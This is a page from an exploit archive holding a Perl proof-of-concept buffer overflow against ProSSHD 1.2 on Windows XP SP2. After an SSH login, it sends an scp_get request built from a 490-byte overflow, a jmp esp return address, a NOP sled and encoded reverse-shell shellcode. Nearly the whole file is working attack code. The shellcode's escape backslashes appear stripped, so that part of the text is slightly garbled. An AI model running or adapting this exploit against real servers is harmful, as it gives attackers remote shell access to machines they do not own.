Home / os / winme

prosshd-overflow.txt

Posted on 03 March 2010

# Exploit Title: ProSSHD buffer overflow # Date: 2010.02.19 # Author: S2 Crew [Hungary] # Software Link: http://www.labtam-inc.com/ # Version: 1.2 20090726 # Tested on: Windows XP SP2
 EN # CVE: - # Registers: # EAX 000003E4 # ECX 0012ED44 # EDX 7C90EB94 ntdll.KiFastSystemCallRet # EBX 00000674 # ESP 0012EFC0 ASCII "BBBBBBBBBBBBBBBBBB..." # EBP 0012F3DC ASCII "BBBBBBBBBBBBBBBBBB..." # ESI 7C81DD9A kernel32.CreatePipe # EDI 0012F3D8 ASCII "BBBBBBBBBBBBBBBBBBB..." # EIP 77D5B8D6 USER32.77D5B8D6 #!/usr/bin/perl use Net::SSH2; $username = 'test'; $password = 'test'; $host = '172.16.29.133'; $port = 22; [*] x86/alpha_mixed succeeded with size 692 (iteration=1) reverse_shell_tcp $shell = "x89xe5xdaxd7xd9x75xf4x5ex56x59x49x49x49x49" . "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" . "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" . "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" . "x42x75x4ax49x4bx4cx48x68x4ex69x45x50x47x70" . "x43x30x51x70x4fx79x4bx55x44x71x4ex32x51x74" . "x4ex6bx43x62x44x70x4ex6bx46x32x46x6cx4ex6b" . "x51x42x45x44x4cx4bx50x72x51x38x46x6fx4fx47" . "x51x5ax51x36x50x31x4bx4fx45x61x4bx70x4ex4c" . "x47x4cx51x71x43x4cx47x72x46x4cx47x50x4ax61" . "x48x4fx46x6dx45x51x4fx37x4dx32x4cx30x51x42" . "x51x47x4ex6bx51x42x44x50x4cx4bx50x42x47x4c" . "x43x31x48x50x4ex6bx43x70x51x68x4ex65x49x50" . "x43x44x42x6ax47x71x4ex30x50x50x4cx4bx50x48" . "x47x68x4ex6bx46x38x51x30x45x51x4bx63x48x63" . "x47x4cx51x59x4cx4bx50x34x4cx4bx45x51x48x56" . "x45x61x49x6fx50x31x49x50x4cx6cx49x51x48x4f" . "x44x4dx45x51x4ax67x47x48x4dx30x50x75x48x74" . "x43x33x43x4dx4cx38x45x6bx51x6dx46x44x43x45" . "x4ax42x51x48x4ex6bx46x38x47x54x47x71x4ax73" . "x42x46x4ex6bx44x4cx42x6bx4cx4bx51x48x47x6c" . "x46x61x4ex33x4cx4bx43x34x4cx4bx46x61x48x50" . "x4dx59x43x74x44x64x46x44x51x4bx43x6bx50x61" . "x43x69x51x4ax46x31x4bx4fx49x70x43x68x43x6f" . "x50x5ax4cx4bx42x32x48x6bx4bx36x51x4dx50x68" . "x45x63x45x62x47x70x45x50x42x48x42x57x44x33" . "x45x62x43x6fx46x34x42x48x50x4cx42x57x51x36" . "x44x47x49x6fx4ax75x4fx48x4cx50x46x61x47x70" . "x45x50x45x79x4fx34x46x34x46x30x50x68x45x79" . "x4bx30x42x4bx47x70x49x6fx4bx65x46x30x42x70" . "x42x70x42x70x51x50x46x30x51x50x50x50x43x58" . "x4bx5ax46x6fx49x4fx49x70x4bx4fx4ax75x4dx59" . "x4bx77x43x58x4cx6cx44x50x47x6dx4bx30x50x68" . "x44x42x45x50x46x71x51x4cx4fx79x49x76x50x6a" . "x46x70x50x56x51x47x42x48x4ax39x4fx55x51x64" . "x45x31x4bx4fx4ax75x50x68x42x43x50x6dx45x34" . "x45x50x4ex69x4ax43x50x57x50x57x46x37x45x61" . "x48x76x50x6ax44x52x43x69x42x76x4ax42x4bx4d" . "x43x56x4ax67x51x54x44x64x47x4cx43x31x45x51" . "x4ex6dx42x64x45x74x44x50x4ax66x47x70x43x74" . "x50x54x46x30x43x66x43x66x46x36x47x36x42x76" . "x50x4ex51x46x43x66x46x33x46x36x50x68x51x69" . "x4ax6cx45x6fx4bx36x49x6fx4bx65x4bx39x49x70" . "x50x4ex50x56x47x36x49x6fx46x50x43x58x46x68" . "x4ex67x45x4dx43x50x4bx4fx49x45x4dx6bx4ax50" . "x4ex55x49x32x43x66x50x68x49x36x4ax35x4dx6d" . "x4dx4dx4bx4fx4ax75x45x6cx45x56x51x6cx45x5a" . "x4bx30x4bx4bx49x70x42x55x43x35x4fx4bx47x37" . "x46x73x43x42x42x4fx51x7ax43x30x50x53x49x6f" . "x48x55x47x7ax41x41"; # jmp esp 0x77dc7c7b user32.dll $fuzz = "x41"x490 . "x7Bx7CxDCx77". "x90"x1000 . $shell; $ssh2 = Net::SSH2->new(); $ssh2->connect($host, $port) || die " Error: Connection Refused! "; $ssh2->auth_password($username, $password) || die " Error: Username/Password Denied! "; $scpget = $ssh2->scp_get($fuzz); $ssh2->disconnect();

 

TOP